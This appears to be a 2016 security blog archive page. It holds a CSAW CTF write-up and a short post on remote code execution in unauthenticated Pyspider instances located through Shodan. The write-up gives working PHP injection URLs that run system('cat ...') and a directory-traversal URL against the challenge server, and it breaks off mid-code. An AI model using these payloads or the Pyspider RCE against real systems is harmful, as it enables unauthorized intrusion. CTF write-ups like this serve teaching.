Posts

Showing posts from September, 2016

[Writeup] CSAW CTF 2016

Image
mfw (125) This main url: http://web.chal.csaw.io:8000 Fuzz it to easy: http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27 Play with flag http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27 flag{3vald_@ss3rt_1s_best_a$$ert} wtf.sh 1 (150) http://web.chal.csaw.io:8001 Register one account, logined. Create post, view post Fuzzing now, i found directory traversal (WTF? traversal again) When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)). I found some interesting function (after use decoder to view beautifull code): function hash_password {     local password=$1;     (shasum <<< ${password}) | cut -d\  -f1; } # hash usernames for lookup in the users_lookup table function hash_username {     local username=$1;     (shasum <<< ${username}) | cut -d\  -f1; } # generate a random token, bas

RCE in Pyspider

Image
Today i read one articles about exploit debug mode in Werkzeug. It old, but very interesting. When i try to find website in shodan, i found 30s website use pyspider. Pyspider is python opensource, you can download and install it from: https://github.com/binux/pyspider It had one problem, it not authentication. Anyone can access. When click to one process, you can go to debug mode. And you can edit python code. So, you can use it to run code execute. It is RCE. This is my POC:        import subprocess         p = subprocess.Popen(["id","-m"], stdout=subprocess.PIPE)         output, err = p.communicate()         print(output) ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.